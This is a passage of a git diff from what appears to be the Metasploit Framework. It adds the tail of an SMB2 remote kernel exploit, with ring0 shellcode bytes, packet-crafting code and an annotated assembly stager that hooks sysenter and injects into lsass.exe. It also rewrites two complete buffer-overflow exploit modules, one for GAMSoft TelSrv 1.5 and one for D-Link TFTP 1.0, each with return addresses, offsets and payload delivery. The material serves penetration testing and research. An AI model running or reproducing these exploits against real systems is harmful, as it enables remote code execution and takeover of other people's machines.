+				"\x00\x74\x11\xBA\x45\x45\x45\x45\x81\xC2\x04\x00\x00\x00\x81\x22" +
+				"\xFF\xFF\xFF\x7F\x61\x9D\xC3\xFF\xFF\xFF\xFF\x42\x42\x42\x42\x43" +
+				"\x43\x43\x43\x60\x6A\x30\x58\x99\x64\x8B\x18\x39\x53\x0C\x74\x2E" +
+				"\x8B\x43\x10\x8B\x40\x3C\x83\xC0\x28\x8B\x08\x03\x48\x03\x81\xF9" +
+				"\x44\x44\x44\x44\x75\x18\xE8\x0A\x00\x00\x00\xE8\x10\x00\x00\x00" +
+				"\xE9\x09\x00\x00\x00\xB9\xDE\xC0\xAD\xDE\x89\xE2\x0F\x34\x61\xC3"
+		# Patch in the required values.
+		r0 = r0.gsub( [ 0x41414141 ].pack("V"), [ ( r0.length + payload.encoded.length - 0x1C ) ].pack("V") )
+		r0 = r0.gsub( [ 0x42424242 ].pack("V"), [ kstager ].pack("V") )
+		r0 = r0.gsub( [ 0x43434343 ].pack("V"), [ ustager ].pack("V") )
+		r0 = r0.gsub( [ 0x44444444 ].pack("V"), [ checksum ].pack("V") )
+		r0 = r0.gsub( [ 0x45454545 ].pack("V"), [ pagetable ].pack("V") )
+		# Return the ring0 -> ring3 payload blob with the real ring3 payload appended.
+		return r0 + payload.encoded
+	end
+	
+	def exploit
+		print_status( "Connecting to the target (#{datastore['RHOST']}:#{datastore['RPORT']})..." )
+		connect
+
+		# we use ReadAddress to avoid problems in srv2!SrvProcCompleteRequest 
+		# and srv2!SrvProcPartialCompleteCompoundedRequest
+		dialects = [ [ target['ReadAddress'] ].pack("V") * 25, "SMB 2.002" ]
+		
+		data  = dialects.collect { |dialect| "\x02" + dialect + "\x00" }.join('')
+		data += [ 0x00000000 ].pack("V") * 37 # Must be NULL's
+		data += [ 0xFFFFFFFF ].pack("V")      # Used in srv2!SrvConsumeDataAndComplete2+0x34 (known stability issue with srv2!SrvConsumeDataAndComplete2+6b)
+		data += [ 0xFFFFFFFF ].pack("V")      # Used in srv2!SrvConsumeDataAndComplete2+0x34	
+		data += [ 0x42424242 ].pack("V") * 7  # Unused
+		data += [ target['MagicIndex'] ].pack("V") # An index to force an increment the SMB header value :) (srv2!SrvConsumeDataAndComplete2+0x7E)
+		data += [ 0x41414141 ].pack("V") * 6  # Unused
+		data += [ target.ret ].pack("V")      # EIP Control thanks to srv2!SrvProcCompleteRequest+0xD2
+		data += ring0_x86_payload( target['PayloadOptions'] || {} ) # Our ring0 -> ring3 shellcode
+		
+		# We gain code execution by returning into the SMB packet, begining with its header.
+		# The SMB packets Magic Header value is 0xFF534D42 which assembles to "CALL DWORD PTR [EBX+0x4D]; INC EDX"
+		# This will cause an access violation if executed as we can never set EBX to a valid pointer.
+		# To overcome this we force an increment of the header value (via MagicIndex), transforming it to 0x00544D42.
+		# This assembles to "ADD BYTE PTR [EBP+ECX*2+0x42], DL" which is fine as ECX will be zero and EBP is a vaild pointer.
+		# We patch the Signature1 value to be a jump forward into our shellcode.
+		packet = Rex::Proto::SMB::Constants::SMB_NEG_PKT.make_struct
+		packet['Payload']['SMB'].v['Command']       = Rex::Proto::SMB::Constants::SMB_COM_NEGOTIATE
+		packet['Payload']['SMB'].v['Flags1']        = 0x18
+		packet['Payload']['SMB'].v['Flags2']        = 0xC853
+		packet['Payload']['SMB'].v['ProcessIDHigh'] = target['ProcessIDHigh']
+		packet['Payload']['SMB'].v['Signature1']    = 0x0158E900 # "JMP DWORD 0x15D" ; jump into our ring0 payload.
+		packet['Payload']['SMB'].v['Signature2']    = 0x00000000 # ...
+		packet['Payload']['SMB'].v['MultiplexID']   = rand( 0x10000 )
+		packet['Payload'].v['Payload']              = data
+		
+		packet = packet.to_s
+		
+		print_status( "Sending the exploit packet (#{packet.length} bytes)..." )
+		sock.put( packet )
+
+
+		wtime = datastore['WAIT'].to_i
+		print_status( "Waiting up to #{wtime} second#{wtime == 1 ? '' : 's'} for exploit to trigger..." )
+		stime = Time.now.to_i
+
+
+		poke_logins = %W{Guest Administrator}
+		poke_logins.each do |login|
+			begin
+				sec = connect(false)
+				sec.login(datastore['SMBName'], login, rand_text_alpha(rand(8)+1), rand_text_alpha(rand(8)+1))
+			rescue ::Exception => e
+				sec.socket.close
+			end			
+		end
+
+		while( stime + wtime > Time.now.to_i )
+			select(nil, nil, nil, 0.25)
+			break if session_created?
+		end
+		
+		handler
+		disconnect
+	end
+
+end
+
+=begin
+;===================================================================================
+; sf
+; Recommended Reading: Kernel-mode Payloads on Windows, 2005, bugcheck & skape.
+;                      http://www.uninformed.org/?v=3&a=4&t=sumry
+;===================================================================================
+[bits 32]
+[org 0]
+;===================================================================================
+ring0_migrate_start:
+	cld
+	cli
+	jmp short ring0_migrate_bounce ; jump to bounce to get ring0_stager_start address
+ring0_migrate_patch:
+	pop esi                        ; pop off ring0_stager_start address
+	; get current sysenter msr (nt!KiFastCallEntry)
+	push 0x176                     ; SYSENTER_EIP_MSR
+	pop ecx
+	rdmsr
+	; save origional sysenter msr (nt!KiFastCallEntry)
+	mov dword [ esi + ( ring0_stager_data - ring0_stager_start ) + 0 ], eax
+	; retrieve the address in kernel memory where we will write the ring0 stager + ring3 code
+	mov edi, dword [ esi + ( ring0_stager_data - ring0_stager_start ) + 4 ]
+	; patch sysenter msr to be our stager
+	mov eax, edi
+	wrmsr
+	; copy over stager to shared memory
+	mov ecx, 0x41414141 ; ( ring3_stager - ring0_stager_start + length(ring3_stager) )
+	rep	movsb
+	sti ; set interrupt flag
+	; Halt this thread to avoid problems.
+ring0_migrate_idle:
+	hlt
+	jmp short ring0_migrate_idle
+ring0_migrate_bounce:
+	call ring0_migrate_patch ; call the patch code, pushing the ring0_stager_start address to stack
+;===================================================================================
+; This stager will now get called every time a ring3 process issues a sysenter
+ring0_stager_start:
+	push byte 0 ; alloc a dword for the patched return address
+	pushfd ; save flags and registers
+	pushad
+	call ring0_stager_eip
+ring0_stager_eip:
+	pop eax
+	; patch in the real nt!KiFastCallEntry address as our return address
+	mov ebx, dword [ eax + ( ring0_stager_data - ring0_stager_eip ) + 0 ]
+	mov [ esp + 36 ], ebx
+	; see if we are being told to remove our sysenter hook...
+	cmp ecx, 0xDEADC0DE
+	jne ring0_stager_hook
+	push 0x176 ; SYSENTER_EIP_MSR
+	pop ecx
+	mov eax, ebx ; set the sysenter msr to be the real nt!KiFastCallEntry address
+	xor edx, edx
+	wrmsr
+	xor eax, eax ; clear eax (the syscall number) so we can continue
+	jmp short ring0_stager_finish
+ring0_stager_hook:
+	; get the origional r3 return address (edx is the ring3 stack pointer)
+	mov esi, [ edx ]
+	; determine if the return is to a "ret" instruction
+	movzx ebx, byte [ esi ]
+	cmp bx, 0xC3
+	; only insert our ring3 stager hook if we are to return to a single ret (for stability).
+	jne short ring0_stager_finish
+	; calculate our r3 address in shared memory
+	mov ebx, dword [ eax + ( ring0_stager_data - ring0_stager_eip ) + 8 ]
+	lea ebx, [ ebx + ring3_start - ring0_stager_start ]
+	; patch in our r3 stage as the r3 return address
+	mov [ edx ], ebx
+	; detect if NX is present (clobbers eax,ebx,ecx,edx)...
+	mov eax, 0x80000001
+	cpuid
+	and edx, 0x00100000 ; bit 20 is the NX bit
+	jz short ring0_stager_finish
+	; modify the correct page table entry to make our ring3 stager executable
+	mov edx, 0x45454545 ; we default to 0xC03FFF00 this for now (should calculate dynamically).
+	add edx, 4
+	and dword [ edx ], 0x7FFFFFFF ; clear the NX bit
+	; finish up by returning into the real KiFastCallEntry and then returning into our ring3 code (if hook was set).
+ring0_stager_finish:
+	popad ; restore registers
+	popfd ; restore flags
+	ret ; return to real nt!KiFastCallEntry
+ring0_stager_data:
+	dd 0xFFFFFFFF ; saved nt!KiFastCallEntry
+	dd 0x42424242 ; kernel memory address of stager (default to 0xFFDF0400)
+	dd 0x43434343 ; shared user memory address of stager (default to 0x7FFE0400)
+;===================================================================================
+ring3_start:
+	pushad
+	push byte 0x30
+	pop eax
+	cdq ; zero edx
+	mov ebx, [ fs : eax ] ; get the PEB
+	cmp [ ebx + 0xC ], edx
+	jz ring3_finish
+	mov eax, [ ebx + 0x10 ] ; get pointer to the ProcessParameters (_RTL_USER_PROCESS_PARAMETERS)
+	mov eax, [ eax + 0x3C ] ; get the current processes ImagePathName (unicode string)
+	add eax, byte 0x28 ; advance past '*:\windows\system32\' (we assume this as we want a system process).
+	mov ecx, [ eax ] ; compute a simple hash of the name. get first 2 wide chars of name 'l\x00s\x00'
+	add ecx, [ eax + 0x3 ] ; and add '\x00a\x00s'
+	cmp ecx, 0x44444444 ; check the hash (default to hash('lsass.exe') == 0x7373616C)
+	jne ring3_finish ; if we are not currently in the correct process, return to real caller
+	call ring3_cleanup ; otherwise we first remove our ring0 sysenter hook
+	call ring3_stager ; and then call the real ring3 payload
+	jmp ring3_finish ; should the payload return we can resume this thread correclty.
+ring3_cleanup:
+	mov ecx, 0xDEADC0DE ; set the magic value for ecx
+	mov edx, esp ; save our esp in edx for sysenter
+	sysenter ; now sysenter into ring0 to remove the sysenter hook (return to ring3_cleanup's caller).
+ring3_finish:
+	popad
+	ret ; return to the origional system calls caller
+;===================================================================================
+ring3_stager:
+	; ...ring3 stager here...
+;===================================================================================
+=end
diff --git a/modules/exploits/windows/telnet/gamsoft_telsrv_username.rb b/modules/exploits/windows/telnet/gamsoft_telsrv_username.rb
index 457452903c..f0f3f3e86b 100644
--- a/modules/exploits/windows/telnet/gamsoft_telsrv_username.rb
+++ b/modules/exploits/windows/telnet/gamsoft_telsrv_username.rb
@@ -1,122 +1,122 @@
-##
-# $Id$
-##
-
-##
-# This file is part of the Metasploit Framework and may be subject to 
-# redistribution and commercial restrictions. Please see the Metasploit
-# Framework web site for more information on licensing and terms of use.
-# http://metasploit.com/framework/ 
-##
-
-require 'msf/core'
-
-
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to 
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/ 
+##
+
+require 'msf/core'
+
+
 class Metasploit3 < Msf::Exploit::Remote
 	Rank = AverageRanking
 	include Msf::Exploit::Remote::Tcp
 	include Msf::Exploit::Remote::Seh
-
-	def initialize(info = {}) 
-		super(update_info(info,    
-			'Name'		=> 'GAMSoft TelSrv 1.5 Username Buffer Overflow',
-			'Description'	=> %q{
-            	This module exploits a username sprintf stack overflow in GAMSoft TelSrv 1.5.
-			Other versions may also be affected. The service terminates after exploitation,
-			so you only get one chance!
-			},
-			'Author' 	=> [ 'Patrick Webster <patrick[at]aushack.com>' ],
-			'Arch'		=> [ ARCH_X86 ], 
-			'License'       => MSF_LICENSE,
-			'Version'        => '$Revision$',
-			'References'    =>
-			[
-				[ 'CVE', '2000-0665'],
+
+	def initialize(info = {}) 
+		super(update_info(info,    
+			'Name'		=> 'GAMSoft TelSrv 1.5 Username Buffer Overflow',
+			'Description'	=> %q{
+            	This module exploits a username sprintf stack overflow in GAMSoft TelSrv 1.5.
+			Other versions may also be affected. The service terminates after exploitation,
+			so you only get one chance!
+			},
+			'Author' 	=> [ 'Patrick Webster <patrick[at]aushack.com>' ],
+			'Arch'		=> [ ARCH_X86 ], 
+			'License'       => MSF_LICENSE,
+			'Version'        => '$Revision$',
+			'References'    =>
+			[
+				[ 'CVE', '2000-0665'],
 				[ 'OSVDB', '373'],
-				[ 'BID', '1478'], 
-				[ 'URL', 'http://cdn.simtel.net/pub/simtelnet/win95/inetmisc/telsrv15.zip'],
-			],         
-			'Privileged'		=> false, 
-			'DefaultOptions'	=>
-			{
-				'EXITFUNC' 	=> 'thread',
-			},
-			'Payload'        	=>
-				{ 
-					'Space'			=> 1000,
-					'BadChars' 		=> "\x00\x0a",
-					'StackAdjustment' 	=> -3500,
-				},
-			'Platform' => ['win'],
-			'Targets'  =>
-			[
-                 		[
-				'Windows 2000 Pro SP0/4 English REMOTE',
-				{
-					'Ret'		=> 0x75022ac4, # pop/pop/ret ws2help.dll w2k pro en ALL
-					'Offset'	=> 1886,
-				}
-				],
-				[ 
-				'Windows 2000 Pro SP0/4 English LOCAL (debug - 127.0.0.1)',
-				{
-					'Ret' 		=> 0x75022ac4, # pop/pop/ret ws2help.dll w2k pro en ALL
-					'Offset'	=> 3318,
-				}
-				],
-				[ 
-				'Windows 2000 Pro SP0/4 English LOCAL (debug - dhcp)',
-				{
-					'Ret' 		=> 0x75022ac4, # pop/pop/ret ws2help.dll w2k pro en ALL
-					'Offset' 	=> 3358,
-				}
-				],
-			        #[
-				#'Windows XP Pro SP0/1 English',
-				#{
-				#	'Ret' 		=> 0x71aa32ad, # pop/pop/ret xp pro en ALL
-				#	'Offset'	=> 2600, # this is made up and absolutely wrong ;-)
-				#}
-				#],
-				#[
-			],
-			'DisclosureDate' => 'Jul 17 2000', 
-			'DefaultTarget' => 0))
-            
-			register_options(
-			[
-				Opt::RPORT(23),
-			], self.class)
-	end
-
-	def check 
-		connect
-		print_status("Attempting to determine if target is vulnerable...")
-		sleep(7)
-		banner = sock.get_once(-1,3)
-
-		if (banner =~ /TelSrv 1\.5/)
-			return Exploit::CheckCode::Vulnerable 
-		end
-		return Exploit::CheckCode::Safe
-	end
-
-	def exploit
-		print_status("Trying target #{target.name} on host #{datastore['RHOST']}:#{datastore['RPORT']}...") 
-		connect
-		print_status("Connected to telnet service... waiting several seconds.") # User friendly message due to sleep.
-		sleep(7) # If unregistered version, you must wait for >5 seconds. Seven is safe. Six is not. 
-
-		username = rand_text_english(20000, payload_badchars)
-		seh = generate_seh_payload(target.ret)
-		username[target['Offset'], seh.length] = seh
-	
-		print_status("Sending #{ username.length} byte username as exploit (including #{seh.length} byte payload)...")
-		sock.put(username)
-		sleep(0.25)
-		print_status('Exploit sent...') 
-		handler
-		disconnect
-	end
-
+				[ 'BID', '1478'], 
+				[ 'URL', 'http://cdn.simtel.net/pub/simtelnet/win95/inetmisc/telsrv15.zip'],
+			],         
+			'Privileged'		=> false, 
+			'DefaultOptions'	=>
+			{
+				'EXITFUNC' 	=> 'thread',
+			},
+			'Payload'        	=>
+				{ 
+					'Space'			=> 1000,
+					'BadChars' 		=> "\x00\x0a",
+					'StackAdjustment' 	=> -3500,
+				},
+			'Platform' => ['win'],
+			'Targets'  =>
+			[
+                 		[
+				'Windows 2000 Pro SP0/4 English REMOTE',
+				{
+					'Ret'		=> 0x75022ac4, # pop/pop/ret ws2help.dll w2k pro en ALL
+					'Offset'	=> 1886,
+				}
+				],
+				[ 
+				'Windows 2000 Pro SP0/4 English LOCAL (debug - 127.0.0.1)',
+				{
+					'Ret' 		=> 0x75022ac4, # pop/pop/ret ws2help.dll w2k pro en ALL
+					'Offset'	=> 3318,
+				}
+				],
+				[ 
+				'Windows 2000 Pro SP0/4 English LOCAL (debug - dhcp)',
+				{
+					'Ret' 		=> 0x75022ac4, # pop/pop/ret ws2help.dll w2k pro en ALL
+					'Offset' 	=> 3358,
+				}
+				],
+			        #[
+				#'Windows XP Pro SP0/1 English',
+				#{
+				#	'Ret' 		=> 0x71aa32ad, # pop/pop/ret xp pro en ALL
+				#	'Offset'	=> 2600, # this is made up and absolutely wrong ;-)
+				#}
+				#],
+				#[
+			],
+			'DisclosureDate' => 'Jul 17 2000', 
+			'DefaultTarget' => 0))
+            
+			register_options(
+			[
+				Opt::RPORT(23),
+			], self.class)
+	end
+
+	def check 
+		connect
+		print_status("Attempting to determine if target is vulnerable...")
+		sleep(7)
+		banner = sock.get_once(-1,3)
+
+		if (banner =~ /TelSrv 1\.5/)
+			return Exploit::CheckCode::Vulnerable 
+		end
+		return Exploit::CheckCode::Safe
+	end
+
+	def exploit
+		print_status("Trying target #{target.name} on host #{datastore['RHOST']}:#{datastore['RPORT']}...") 
+		connect
+		print_status("Connected to telnet service... waiting several seconds.") # User friendly message due to sleep.
+		sleep(7) # If unregistered version, you must wait for >5 seconds. Seven is safe. Six is not. 
+
+		username = rand_text_english(20000, payload_badchars)
+		seh = generate_seh_payload(target.ret)
+		username[target['Offset'], seh.length] = seh
+	
+		print_status("Sending #{ username.length} byte username as exploit (including #{seh.length} byte payload)...")
+		sock.put(username)
+		sleep(0.25)
+		print_status('Exploit sent...') 
+		handler
+		disconnect
+	end
+
 end
diff --git a/modules/exploits/windows/tftp/dlink_long_filename.rb b/modules/exploits/windows/tftp/dlink_long_filename.rb
index 0a8e1d98cb..408e737989 100644
--- a/modules/exploits/windows/tftp/dlink_long_filename.rb
+++ b/modules/exploits/windows/tftp/dlink_long_filename.rb
@@ -1,87 +1,87 @@
-##
-# $Id$
-##
-
-##
-# This file is part of the Metasploit Framework and may be subject to 
-# redistribution and commercial restrictions. Please see the Metasploit
-# Framework web site for more information on licensing and terms of use.
-# http://metasploit.com/framework/ 
-##
-
-require 'msf/core'
-
-class Metasploit3 < Msf::Exploit::Remote
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to 
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/ 
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
 	Rank = GoodRanking
-
-	include Msf::Exploit::Remote::Udp
-
-	def initialize(info = {})
-		super(update_info(info,
-			'Name'           => 'D-Link TFTP 1.0 Long Filename Buffer Overflow',
-			'Description'    => %q{
-					This module exploits a stack overflow in D-Link TFTP 1.0.
-					By sending a request for an overly long file name, an attacker 
-					could overflow a buffer and execute arbitrary code. For best results,
-					use bind payloads with nonx (No NX).
-			},
-			'Author'         => 	[
-							'LSO <lso[@]hushmail.com>', # Exploit module
-							'patrick', # Refs, stability, targets etc
-						],
-			'Version'        => '$Revision$',
-			'References'     => 
-				[ 
-					[ 'CVE', '2007-1435' ],
-					[ 'OSVDB', '33977' ],
-					[ 'BID', '22923' ],
-				],
-			'DefaultOptions' =>
-				{
-					'EXITFUNC' => 'process',
-				},
-			'Payload'        =>
-				{
-					'Space'    => 1024,
-					'BadChars' => "\x00",
-					'Compat'   => 
-					{
-						'ConnectionType' => '-reverse',
-					},
-				},
-			'SaveRegisters'  => [ 'ecx', 'eax', 'esi' ],
-			'Platform'       => 'win',
-			
-			'Targets'        =>
-				[
-					# Patrick tested OK 20090228
-					['Windows 2000 SP4 English', { 'Ret' => 0x77e1ccf7 } ], # jmp ebx
-					['Windows 2000 SP3 English', { 'Ret' => 0x77f8361b } ], # jmp ebx
-				],
-			'Privileged'     => false,
-			'DisclosureDate' => 'Mar 12 2007',
-			'DefaultTarget' => 0))
-
-			register_options([Opt::RPORT(69)], self)
-
-	end
-
-	def exploit
-		connect_udp
-
-		print_status("Trying target #{target.name}...")
-
-		juju = "\x00\x01"  
-		juju << Rex::Text.rand_text_alpha_upper(581)
-		juju << Rex::Arch::X86.jmp_short(42)
-		juju << Rex::Text.rand_text_alpha_upper(38)
-		juju << [target.ret].pack('V') + payload.encoded
- 
-		udp_sock.put(juju)
-
-		handler
-		disconnect_udp
-	end
-
-end
-
+
+	include Msf::Exploit::Remote::Udp
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'           => 'D-Link TFTP 1.0 Long Filename Buffer Overflow',
+			'Description'    => %q{
+					This module exploits a stack overflow in D-Link TFTP 1.0.
+					By sending a request for an overly long file name, an attacker 
+					could overflow a buffer and execute arbitrary code. For best results,
+					use bind payloads with nonx (No NX).
+			},
+			'Author'         => 	[
+							'LSO <lso[@]hushmail.com>', # Exploit module
+							'patrick', # Refs, stability, targets etc
+						],
+			'Version'        => '$Revision$',
+			'References'     => 
+				[ 
+					[ 'CVE', '2007-1435' ],
+					[ 'OSVDB', '33977' ],
+					[ 'BID', '22923' ],
+				],
+			'DefaultOptions' =>
+				{
+					'EXITFUNC' => 'process',
+				},
+			'Payload'        =>
+				{
+					'Space'    => 1024,
+					'BadChars' => "\x00",
+					'Compat'   => 
+					{
+						'ConnectionType' => '-reverse',
+					},
+				},
+			'SaveRegisters'  => [ 'ecx', 'eax', 'esi' ],
+			'Platform'       => 'win',
+			
+			'Targets'        =>
+				[
+					# Patrick tested OK 20090228
+					['Windows 2000 SP4 English', { 'Ret' => 0x77e1ccf7 } ], # jmp ebx
+					['Windows 2000 SP3 English', { 'Ret' => 0x77f8361b } ], # jmp ebx
+				],
+			'Privileged'     => false,
+			'DisclosureDate' => 'Mar 12 2007',
+			'DefaultTarget' => 0))
+
+			register_options([Opt::RPORT(69)], self)
+
+	end
+
+	def exploit
+		connect_udp
+
+		print_status("Trying target #{target.name}...")
+
+		juju = "\x00\x01"  
+		juju << Rex::Text.rand_text_alpha_upper(581)
+		juju << Rex::Arch::X86.jmp_short(42)
+		juju << Rex::Text.rand_text_alpha_upper(38)
+		juju << [target.ret].pack('V') + payload.encoded
+ 
+		udp_sock.put(juju)
+
+		handler
+		disconnect_udp
+	end
+
+end
+